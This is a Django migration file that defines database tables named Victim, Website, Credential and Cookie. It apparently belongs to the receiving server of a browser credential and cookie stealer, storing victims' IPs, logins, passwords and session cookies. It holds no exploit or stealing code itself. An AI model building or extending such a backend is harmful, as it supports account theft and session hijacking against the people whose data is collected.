# Generated by Django 3.1 on 2021-05-08 13:06

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Victim',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('country', models.TextField(blank=True, default='', max_length=1000, verbose_name='Pays')),
                ('ip', models.TextField(blank=True, default='', max_length=1000, verbose_name='IP adress')),
            ],
            options={
                'verbose_name': 'Victims',
            },
        ),
        migrations.CreateModel(
            name='Website',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('hostname', models.CharField(default='', max_length=999, verbose_name='hostname')),
            ],
        ),
        migrations.CreateModel(
            name='Credential',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('login', models.CharField(default='', max_length=999, verbose_name='login')),
                ('password', models.CharField(default='', max_length=999, verbose_name='password')),
                ('website', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='revelation_server_app.website')),
            ],
            options={
                'verbose_name': 'Credentials',
            },
        ),
        migrations.CreateModel(
            name='Cookie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(default='', max_length=999, verbose_name='name')),
                ('path', models.CharField(default='', max_length=999, verbose_name='path')),
                ('expiresutc', models.CharField(default='', max_length=999, verbose_name='expires utc')),
                ('key', models.CharField(default='', max_length=999, verbose_name='key')),
                ('value', models.CharField(default='', max_length=999, verbose_name='value')),
                ('issecure', models.CharField(default='', max_length=999, verbose_name='is secure')),
                ('website', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='revelation_server_app.website')),
            ],
            options={
                'verbose_name': 'Cookie',
            },
        ),
    ]
